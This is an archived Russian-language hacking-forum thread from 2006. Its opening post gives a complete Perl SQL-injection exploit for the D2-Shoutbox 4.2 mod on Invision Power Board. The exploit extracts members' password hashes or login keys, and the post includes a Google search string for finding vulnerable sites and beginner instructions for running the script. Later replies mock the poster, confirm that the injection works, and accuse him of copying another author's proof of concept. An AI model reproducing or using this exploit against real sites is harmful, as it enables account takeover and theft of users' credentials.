Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   D2-Shoutbox (https://forum.antichat.xyz/showthread.php?t=19030)

Dracula4ever 13.05.2006 10:42

Взлов чата на Ipb
 
Ладно,сначало скачайте програму ActivePerl.
её можно скпчпть отсюда.

http://downloads.activestate.com/Act...x86-148120.msi


Теперь где вставляют тексты в той програме перепишите этот код:
Цитата:


#!/usr/bin/perl
################################################## #######
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#D2-Shoutbox 4.2(IPB Mod)<=SQL injection #
#Created By dracula4ever #
#ANTICHAT security Team #
#
#dracula4ever@walla.com#
#ISRAEL #
################################################## #######
#google:
#"Powered By D2-Shoutbox 4.2"
################################################## #######
use IO::Socket;
$host = $ARGV[0];
$user = $ARGV[2];
$uid = $ARGV[3];
$pid = $ARGV[4];
$type = $ARGV[5];

sub type()
{
if($type==1){$row="password";}
if($type==2){$row="member_login_key";}
else{print "Just 1 Or 2\n";exit();}
$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.", null,null,null%20FROM%20ibf_members%20where%20id=" .$user."/*";
$path = $ARGV[1].$sql;
}


sub header()
{
print q{
################################################## #####################
### D2-Shoutbox 4.2 SQL injection Exploit ###
### Tested On D2-Shoutbox 4.2 And IPB 2.4 ###
### Created By Dracula4ever, ANTICHAT Security Team ###
################################################## #####################
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
################################################## #####################
}
}

sub sedsock()
{
$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
print $sedsock "GET $path HTTP/1.1\n";
print $sedsock "Host: $host\n";
print $sedsock "Accept: */*\n";
print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
print $sedsock "Connection: close\n\n";
while($res = <$sedsock>){
$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
}
}

if(@ARGV < 6){
header();
}else{
type();
sedsock();
}

Теперь сохраните это с названием ipb.pl в дисководе С:/
Теперь зайдите в CMD и напишите color a потом cd c:\ и потом cls и в конце напишите perl ipb.pl .

Надеюсь вам понравилось.

LoFFi 13.05.2006 10:49

=)))))))))))))))))))))))))
Я сначала даже не понял это =)))))))))
ЛОЛ. вот это пособие.........


Совет: Выложи какую нить багу или что нибудь в этом роде, а вот как ей пользоватся, мы то уж знаем, а те кто не знают, пусть и не лезут пока на бедные сайты.
ИМХО: Создавать отдельную тему не надо было =) Ты б еще в статьи затулил =)

Dracula4ever 13.05.2006 11:01

Если ты знаеш Perl тогда ты всё поймеш

degeneration x 13.05.2006 12:11

D2-Shoutbox не столь популярен, и на форумы его почти не ставят.

qBiN 13.05.2006 12:43

Цитата:

ANTICHAT Security Team
Паржал...Переправить следует...Во вторых чаты в чаты.

max_pain89 13.05.2006 12:50

Цитата:

ANTICHAT security Team
Такая есть? Гг тут только группы.

Rebz 13.05.2006 13:57

#Created By dracula4ever #
#ANTICHAT security Team #

Хаххаа))))))))) нда.. это сильно!
Не надо гнать на Шаутбокс..распространенная вещь -))

по теме - молоток.. инъекция работает..

Zitt 13.05.2006 15:21

Но для отделной темы всёравно моловато!

Rebz 13.05.2006 22:07

http://ivdb.org/poc/1337.htm
Так кто же истинный автор уязвимости?????? :mad:

ps плохо не соблюдать чужие копирайты и переделывать их на свои

.Slip 13.05.2006 22:14

Rebz, ты прям Шерлок Холмс ;)
dracula4ever, стыдись **** :mad:


Время: 20:03